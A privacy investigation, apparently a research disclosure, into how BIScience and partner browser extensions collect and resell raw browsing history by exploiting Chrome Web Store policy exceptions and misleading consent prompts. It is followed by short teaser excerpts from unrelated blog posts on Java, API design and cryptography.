Despite BIScience’s claims that they only acquire anonymized data, their own extensions send raw URLs, and third-party extensions also send raw URLs to BIScience. Therefore BIScience collects granular clickstream data, not anonymized data.
If they meant to say that they only use/resell anonymized data, that’s not comforting either. BIScience receives the raw data and may store, use, or resell it as they choose. They may be compelled by governments to provide the raw data, or other bad actors may compromise their systems and access the raw data. In general, collecting more data than needed increases risks for user privacy.
Even if they anonymize data as soon as they receive it, anonymous clickstream data can contain sensitive or identifying information. A notable example is the Avast-Jumpshot case discovered by Wladimir Palant, who also wrote a deep dive into why anonymizing browsing history is very hard.
As the U.S. FTC investigation found, Jumpshot stored unique device IDs that did not change over time. This allowed reidentification with a sufficient number of URLs containing identifying information or when combined with other commercially-available data sources.
Similarly, BIScience’s collected browsing history is also tied to a unique device ID that does not change over time. A user’s browsing history may be tied to their unique ID for years, making it easier for BIScience or their buyers to perform reidentification.
BIScience’s privacy policy states granular browsing history information is sometimes sold with unique identifiers (emphasis ours):
In most cases the Insights are shared and [sold] in an aggregated non-identifying manner, however, in certain cases we will sell or share the insights with a general unique identifier, this identifier does not include your name or contact information, it is a random serial number associated with an End Users’ browsing activity. However, in certain jurisdictions this is considered Personal Data, and thus, we treat it as such.
When you read the Chrome Web Store privacy disclosures on every extension listing, they say:
This developer declares that your data is
- Not being sold to third parties, outside of approved use cases
- Not being used or transferred for purposes that are unrelated to the item’s core functionality
- Not being used or transferred to determine creditworthiness or for lending purposes
You might wonder:
BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly exceptions listed in the Limited Use policy which are the “approved use cases”. These exceptions appear to allow the transfer of user data to third parties for any of the following purposes:
- if necessary to providing or improving your single purpose;
- to comply with applicable laws;
- to protect against malware, spam, phishing, or other fraud or abuse; or,
- as part of a merger, acquisition or sale of assets of the developer after obtaining explicit prior consent from the user
The Limited Use policy later states:
All other transfers, uses, or sale of user data is completely prohibited, including:
- Transferring, using, or selling data for personalized advertisements.
- Transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers.
- Transferring, using, or selling user data to determine credit-worthiness or for lending purposes.
BIScience and partner extensions develop user-facing features that allegedly require access to browsing history, to claim the “necessary to providing or improving your single purpose” exception. They also often implement safe browsing or ad blocking features, to claim the “protect against malware, spam, phishing” exception.
Chrome Web Store appears to interpret their policies as allowing the transfer of user data, if extensions claim Limited Use exceptions through their privacy policy or other user disclosures. Unfortunately, bad actors falsely claim these exceptions to sell user data to third parties.
This is despite the CWS User Data FAQ stating (emphasis ours):
- Can my extension collect web browsing activity not necessary for a user-facing feature, such as collecting behavioral ad-targeting data or other monetization purposes?
No. The Limited Uses of User Data section states that an extension can only collect and transmit web browsing activity to the extent required for a user-facing feature that is prominently described in the Chrome Web Store page and user interface. Ad targeting or other monetization of this data isn’t for a user-facing feature. And, even if a user-facing feature required collection of this data, its use for ad targeting or any other monetization of the data wouldn’t be permitted because the Product is only permitted to use the data for the user-facing feature.
In other words, even if there is a “legitimate” feature that collects browsing history, the same data cannot be sold for profit.
Unfortunately, when we and other researchers ask Google to enforce these policies, they appear to lean towards giving bad actors the benefit of the doubt and allow the sale of user data obtained under false pretenses.
We have the receipts contracts, emails, and more to prove BIScience and partners transfer and sell user data in a “completely prohibited” manner, primarily for the purpose of “transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers” with intent to monetize the data.
Urban products (owned by BIScience) appear to provide ad blocking and safe browsing services, both of which may claim the “protect against malware, spam, phishing” exception. Their VPN products (Urban VPN, 1ClickVPN) may claim the “necessary to providing single purpose” exception.
These exceptions are abused by BIScience to collect browsing history data for prohibited purposes, because they also sell this user data to third parties through AdClarity and other BIScience products. There are ways to provide these services without processing raw URLs in servers, therefore they do not need to collect this data. They certainly don’t need to sell it to third parties.
Reputable ad blocking extensions, such as Adblock Plus, perform blocking solely on the client side, without sending every URL to a server. Safe browsing protection can also be performed client side or in a more privacy-preserving manner even when using server-side processing.
Partner third-party extensions collect data under even worse false pretenses. Partners are encouraged by BIScience to implement bogus services that exist solely to collect and sell browsing history to BIScience. These bogus features are only added to claim the Limited Use policy exceptions.
We analyzed several third-party extensions that partner with BIScience. None have legitimate business or technical reasons to collect browsing history and sell it to BIScience.
BIScience provides partner extensions with two integration options: They can add the BIScience SDK to automatically collect data, or partners can send their self-collected data to a BIScience API endpoint or S3 bucket.
The consistent message from the documents and emails provided by BIScience to our sources is essentially this, in our own words: You can integrate our SDK or send us browsing history activity if you make a plausible feature for your existing extension that has nothing to do with your actual functionality that you have provided for years. And here are some lies you can tell CWS to justify the collection.
The SDKs we have observed provide either safe browsing or ad blocking features, which makes it easy for partner extensions to claim the “protect against malware, spam, phishing” exception.
The SDK checks raw URLs against a BIScience service hosted on sclpfybn.com. With light integration work, an extension can allege they offer safe browsing protection or ad blocking. We have not evaluated how effective this safe browsing protection is compared to reputable vendors, but we suspect it performs minimal functionality to pass casual examination. We confirmed this endpoint also collects user data to resell it, which is unrelated to the safe browsing protection.
Whether implemented through the SDK or their own custom integration, the new “features” in partner extensions were completely unrelated to the extension’s existing core functionality. All the analyzed extensions had working core functionality before they added the BIScience integrations.
Let’s look at this illuminating graphic, sent by BIScience to one of our sources:
Notice how the graphic shows raw URLs are sent to BIScience regardless of whether the URL is needed to provide the user functionality, such as safe browsing protection. The step of sending data to BIScience is explicitly outside and separate from the user functionality.
BIScience’s integration guide suggests changes to an extension’s privacy policy in an attempt to comply with laws and Chrome Web Store policies, such as:
Company does not sell or rent your personal data to any third parties. We do, however, need to share your personal data to run our everyday business. We share your personal data with our affiliates and third-party service providers for everyday business purposes, including to:
- Detect and suggest to close malware websites;
- Analytics and Traffic Intelligence
This and other suggested clauses contradict each other or are misleading to users.
Quick fact check:
An astute reader may also notice BIScience considers browsing history data as personal data, given these clauses are meant to disclose transfer of browsing history to BIScience.
BIScience’s contracts with partners require opt-in consent for browsing history collection, but in practice these consents are misleading at best. Each partner must write their own consent prompt, which is not provided by BIScience in the SDK or documentation.
As an example, the extension Visual Effects for Google Meet integrated the BIScience safe browsing SDK to develop a new “feature” that collects browsing history:
We identified other instances of consent prompts that are even more misleading, such as a vague “To continue using our extension, please allow web history access” within the main product interface. This was only used to obtain consent for the BIScience integration and had no other purpose.
When you read the Chrome Web Store privacy disclosures on every extension listing, you might be inclined to believe the extension isn’t selling your browsing history to a third party. Unfortunately, Chrome Web Store allows this if extensions pretend they are collecting “anonymized” browsing history for “legitimate” purposes.
Our hope is that Chrome Web Store closes these loopholes and enforces stricter parts of the existing Limited Use and Single Purpose policies. This would align with the Chrome Web Store principles of Be Safe, Be Honest, and Be Useful.
If they don’t close these loopholes, we want CWS to clarify existing privacy disclosures shown to all users in extension listings. These disclosures are currently insufficient to communicate that user data is being sold under these exceptions.
Browser extension users deserve better privacy and transparency.
If you want to learn more about browser extensions collecting your browsing history for profit:
The Secure Annex blog post publicly disclosed many domains related to BIScience. We have observed additional domains over the years, and have included all the domains below.
We have chosen not to disclose some domains used in custom integrations to protect our sources and ongoing research.
Collection endpoints seen in third-party extensions:
Collection endpoints seen in BIScience-owned extensions and software:
Third-party extensions which have disclosed in their privacy policies that they share raw browsing history with BIScience (credit to Wladimir Palant for identifying these):
Collection endpoints seen in online data, software unknown but likely in third-party software:
Collection endpoint in third-party software, identified in 2019 DataSpii research:
When I was writing Rating 26 years of Java changes, I started reflecting on the new HttpClient library in Java 11. The old way of fetching a URL was to use URL.openConnection(). This was intended to be a generic mechanism for retrieving the contents of any URL: files, web resources, FTP servers, etc. It was a […]
This post covers several topics around collections (sets, lists, maps/dictionaries, queues, etc) that I’d like to see someone explore more fully. To my knowledge, there are many alternative collection libraries for Java and for many other languages, but I’m not aware of any that provide support for monotonic collections. What is a monotonic collection, I […]
It’s been a while since I’ve written a pure programming post. I was recently implementing a specialist collection class that contained items of a number of different types. I needed to be able to iterate over the collection performing different actions depending on the specific type. There are lots of different ways to do this, […]
I first started programming Java at IBM back in 1999 as a Pre-University Employee. If I remember correctly, we had Java 1.1.8 installed at that time, but were moving to Java 1.2 (“Java 2”), which was a massive release—I remember engineers at the time grumbling that the ever-present “Java in a Nutshell” book had grown […]
OK, so you’ve made your JSON-over-HTTP API. Then someone told you that it’s not “really” REST unless it’s hypertext-driven. So now all your responses contain links, and you’re defining mediatypes properly and all that stuff. But I’m here to tell you that you’re still not doing it right. What you’re doing now is just “HYPE”. […]
Note: this post will probably only really make sense to cryptography geeks. In “When a KEM is not enough”, I described how to construct multi-recipient (public key) authenticated encryption. A naïve approach to this is vulnerable to insider forgeries: any recipient can construct a new message (to the same recipients) that appears to come from the […]
tl;dr: yes, contra thingamajig’s law of wotsits. Before the final nail has even been hammered on the coffin of AI, I hear the next big marketing wave is “quantum”. Quantum computing promises to speed up various useful calculations, but is also potentially catastrophic to widely-deployed public key cryptography. Shor’s algorithm for a quantum computer, if […]
I decided today to take a look at CloudFlare’s new OAuth provider library, which they apparently coded almost entirely with Anthropic’s Claude LLM: This library (including the schema documentation) was largely written with the help of Claude, the AI model by Anthropic. Claude’s output was thoroughly reviewed by Cloudflare engineers with careful attention paid to security […]
Every programmer knows Donald Knuth’s famous quote that “premature optimization is the root of all evil”, from his 1974 Turing Award lecture (pdf). A fuller quotation of the surrounding context gives a rounder view: I am sorry to say that many people nowadays are condemning program efficiency, telling us that it is in bad taste. […]
Wikipedia’s definition of a digital signature is: A digital signature is a mathematical scheme for verifying the authenticity of digital messages or documents. A valid digital signature on a message gives a recipient confidence that the message came from a sender known to the recipient. —Wikipedia They also have a handy diagram of the process […]
I’ve been slowly reading Brian Cantwell Smith’s “The Promise of Artificial Intelligence” recently. I haven’t finished reading it yet, and like much of BCS’s writing, it’ll probably take me 3 or 4 read-throughs to really understand it, but there’s one point that I want to pick up on. It is the idea that “Good Old-Fashioned […]
It turns out you can encrypt more than 2^32 messages with AES-GCM with a random nonce under certain conditions. It’s still not a good idea, but you can just about do it. #cryptography
I see a lot of attempts to define encryption schemes for constrained devices with short authentication tags (e.g., 64 bits) using universal hashing. For example, there’s a proposal in CFRG at the moment for a version of AES-GCM with short tags for this kind of use-case. In my (admittedly limited) experience, these kinds of constrained […]
Happy new year! I’m hoping to write a few posts on here over the next few weeks, but probably exploring a few topics around AI and philosophy. If you’d prefer some more technical content around security and cryptography, then take a look at the newsletter I put out for my consulting company, Illuminated Security. The […]
I was just reading yet another article on REST API design guidelines. Some of it is good advice, some of it I could quibble with. But several of the rules are about how to design the path hierarchy of your API: use plural nouns, don’t use nested sub-paths unnecessarily, etc. In this article I want […]
For better or worse, depending on your perspective, JSON has become a dominant data format and shows no signs of being replaced any time soon. There are good reasons for that: on the face of it, it provides a very simple format with just enough features to cover a lot of use-cases with minimal feature […]
If you want to learn how to store passwords securely, you could do a lot worse than looking at the OWASP Password Storage Cheat Sheet. These cheat sheets are generally pretty good, and the password storage one is particularly good. The editors do a great job of keeping it up to date and incorporating the […]
In cryptography, the process of authenticating a user (or app/service) is known as entity authentication or identification (to distinguish it from message authentication or data origin authentication). There are lots of ways to do this. In this post I’m going to talk about authentication schemes based on public key cryptography. It turns out that the […]
Mike Rosulek, Oregon State University. Draft of January 3, 2021. Online: The Joy of Cryptography. This is a freely-available book covering introductory material on cryptography. It’s suitable for anyone with undergraduate-level computer science knowledge. As is often the case in cryptography textbooks, there is a brief review of mathematical background in the first (or zeroth […]
I enjoyed Hillel Wayne’s recent newsletter about microfeatures they’d like to see in programming languages. A “microfeature” is essentially a small convenience that makes programming in that language a bit easier without fundamentally changing it. I love this idea. I’m partial to a bit of syntactic sugar, even if it can cause cancer of the […]
There has been a lot of discussion recently around the LastPass breach, especially with regards to the number of PBKDF2 iterations applied to the master password to derive the vault encryption key. Other people have already dissected this particular breach, but I want to more generally talk about PBKDF2 iterations and security models. (I’m not […]
Just a few quick notes/updates to correct some potentially inaccurate statements that are floating around on Reddit/Twitter etc: The bug only impacts Java 15 and above. The original advisory from Oracle incorrectly listed earlier versions (like 7, 8 and 11) as being impacted. They have since corrected this. Note that they now only list 17 […]
The long-running BBC sci-fi show Doctor Who has a recurring plot device where the Doctor manages to get out of trouble by showing an identity card which is actually completely blank. Of course, this being Doctor Who, the card is really made out of a special “psychic paper“, which causes the person looking at it […]
Datalog is a logic programming language, based on Prolog, which is seeing something of a resurgence in interest in recent years. In particular, several recent approaches to authorization (working out who can do what) have used Datalog as the logical basis for access control decisions. On the face of it, this seems like a perfect […]
I was catching up on the always excellent Security. Cryptography. Whatever. podcast, and enjoyed the episode with Colm MacCárthaigh about a bunch of topics around TLS. It’s a great episode that touches a lot of subjects I’m interested in, so go ahead and listen to it if you haven’t already, and definitely subscribe. I want […]
When working with Message Authentication Codes (MACs), you often need to authenticate not just a single string, but multiple fields of data. For example, when creating an authenticated encryption mode by composing a cipher and a MAC (like AES-CBC and HMAC), you need to ensure the MAC covers the IV, associated data, and the ciphertext. […]
This is the third part of my series on Key Encapsulation Mechanisms (KEMs) and why you should care about them. Part 1 looked at what a KEM is and the KEM/DEM paradigm for constructing public key encryption schemes. Part 2 looked at cases where the basic KEM abstraction is not sufficient and showed how it […]
In “Towards a standard for bearer token URLs”, I described a URL scheme that can be safely used to incorporate a bearer token (such as an OAuth access token) into a URL. That blog post concentrated on the technical details of how that would work and the security properties of the scheme. But as Tim Dierks […]
In XSS doesn’t have to be Game Over, and earlier when discussing Can you ever (safely) include credentials in a URL?, I raised the possibility of standardising a new URL scheme that safely allows encoding a bearer token into a URL. This makes it more convenient to use lots of very fine-grained tokens rather than one […]
In my previous post, I described the KEM/DEM paradigm for hybrid encryption. The key encapsulation mechanism is given the recipient’s public key and outputs a fresh AES key and an encapsulation of that key that the recipient can decapsulate to recover the AES key. In this post I want to talk about several ways that […]